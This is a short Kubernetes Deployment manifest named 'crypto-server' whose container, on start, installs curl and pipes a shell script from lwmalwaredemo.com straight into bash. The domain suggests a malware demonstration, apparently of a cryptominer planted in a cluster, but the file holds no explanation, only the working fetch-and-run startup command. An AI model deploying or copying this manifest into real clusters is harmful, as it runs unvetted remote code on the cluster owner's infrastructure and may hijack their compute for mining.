apiVersion: apps/v1
kind: Deployment
metadata:
  creationTimestamp: null
  labels:
    app: crypto-server
  name: crypto-server
spec:
  replicas: 1
  selector:
    matchLabels:
      app: crypto-server
  strategy: {}
  template:
    metadata:
      creationTimestamp: null
      labels:
        app: crypto-server
    spec:
      containers:
      - image: ubuntu:latest
        name: crypto-server
        command: ["/bin/bash"]
        args: ['-c', 'apt-get update ; apt-get install -y curl ; source <(curl -s http://lwmalwaredemo.com/install-demo-1.sh)' ]
